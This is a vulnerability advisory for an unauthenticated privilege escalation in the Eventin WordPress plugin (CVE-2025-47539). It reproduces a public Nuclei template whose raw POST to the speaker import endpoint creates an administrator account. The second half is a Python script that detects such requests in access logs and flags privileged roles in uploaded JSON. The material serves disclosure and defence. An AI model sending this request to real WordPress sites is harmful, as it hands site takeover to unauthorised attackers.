CVE-2025-47539: Eventin <= 4.0.26 - Privilege Escalation

Date: 2025-08-01 | Affected software: Eventin | PoC: public

Vulnerability description

The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.

PoC code [public]

id: CVE-2025-47539

info:
  name: Eventin <= 4.0.26 - Privilege Escalation
  author: pdresearch
  severity: critical
  description: |
    The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.
  reference:
    - https://patchstack.com/database/vulnerability/eventin/wordpress-eventin-plugin-4-0-26-unauthenticated-privilege-escalation-vulnerability
    - https://themewinter.com/eventin/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47539
  classification:
    epss-score: 0.14363
    epss-percentile: 0.94193
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47539
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 1
    vendor: themewinter
    product: eventin
    fofa-query: body="/wp-content/plugins/eventin"
  tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev

variables:
  name: "{{randbase(5)}}"
  oast: "oast.fun"

http:
  - raw:
      - |
        POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5Gx6VCxm3HMV2A9

        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9
        Content-Disposition: form-data; name="speaker_import"; filename="speakers.json"
        Content-Type: application/json

        [
          {
            "id": "999",
            "name": "{{name}}",
            "email": "{{name}}@{{oast}}",
            "image": "",
            "designation": "test",
            "summary": "",
            "social": [
              []
            ],
            "company_logo": "",
            "company_url": "",
            "speaker_group": "",
            "speaker_category": [
              "speaker"
            ],
            "company_name": "",
            "author_url": "",
            "role": "administrator"
          }
        ]
        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9--

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Successfully imported speaker")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: dsl  # type of the extractor
        dsl:
          - '"Email: " + name + "@" + oast'  # the variable to extract
# digest: 490a004630440220226a0bab75d688ec26e701515fbc94d2b5a48f412625643863d05a6eddb3bd4102203547acb65a73ee8327d8fbf7fde6b2410037200875bf4f02fa7422813b99bc75:922c64590222798bb761d5b6d8e72950
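The template above sends a single unauthenticated POST to the speaker import route, so the request is easy to spot in ordinary web-server logs. The following is an added detection example written for this page; it is not part of the advisory, the Nuclei template, or the Eventin plugin. It assumes access logs in the Apache/nginx combined format, that the route is also reachable through WordPress's generic `index.php?rest_route=` form like any other REST route, and a constructed set of privileged role names to flag when a WAF has captured the uploaded JSON; the log lines and JSON body are constructed samples.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Path of the unauthenticated import endpoint used by the PoC template above.
IMPORT_PATH = "/wp-json/eventin/v2/speakers/import"
# WordPress exposes every REST route via index.php?rest_route=... as well
# (assumption: the plugin route behaves like any other registered route).
IMPORT_ROUTE = "/eventin/v2/speakers/import"

# Roles a speaker import should never be able to assign (assumed policy for
# this example; adjust to the site's own role model).
PRIVILEGED_ROLES = {"administrator", "editor", "author", "contributor"}

# Combined log format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:15:02 +0000] "POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1" 200 87 "-" "python-requests/2.31"',
    '203.0.113.7 - - [01/Aug/2025:10:15:03 +0000] "POST /index.php?rest_route=/eventin/v2/speakers/import HTTP/1.1" 403 61 "-" "python-requests/2.31"',
    '198.51.100.4 - - [01/Aug/2025:10:16:10 +0000] "GET /wp-json/eventin/v2/speakers HTTP/1.1" 200 1422 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Aug/2025:10:16:11 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Constructed JSON body as a WAF might capture it from the speaker_import part.
SAMPLE_BODY = json.dumps([
    {"id": "1", "name": "Legit Speaker", "email": "legit@example.invalid", "role": "subscriber"},
    {"id": "999", "name": "x", "email": "x@example.invalid", "role": "administrator"},
])


def targets_import_endpoint(target: str) -> bool:
    """True if the request target reaches the speaker import route."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") == IMPORT_PATH:
        return True
    route = parse_qs(parts.query).get("rest_route", [""])[0]
    return route.rstrip("/") == IMPORT_ROUTE


def scan_access_log(lines):
    """Return one finding per POST to the import route; a 200 means the
    import was accepted and the site's user list should be reviewed."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if m["method"] != "POST" or not targets_import_endpoint(m["target"]):
            continue
        findings.append({
            "ip": m["ip"],
            "target": m["target"],
            "status": int(m["status"]),
            "succeeded": m["status"] == "200",
        })
    return findings


def escalating_records(body: str):
    """Given a captured JSON array of speaker records, return those that try
    to set a privileged role. Malformed input yields no records."""
    try:
        records = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(records, list):
        return []
    return [r for r in records
            if isinstance(r, dict)
            and str(r.get("role", "")).lower() in PRIVILEGED_ROLES]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("import POST from %(ip)s -> %(target)s (HTTP %(status)d)" % f)
    for r in escalating_records(SAMPLE_BODY):
        print("privileged role in import record id=%s role=%s" % (r["id"], r["role"]))
```

A successful POST (HTTP 200) to this route from a host with no prior authenticated session is the signal to act on; after patching to 4.0.27 or later, review recently created accounts and any administrator whose creation coincides with such a request. The `rest_route` check matters because blocking only the `/wp-json/` path would leave the equivalent `index.php` form uncovered.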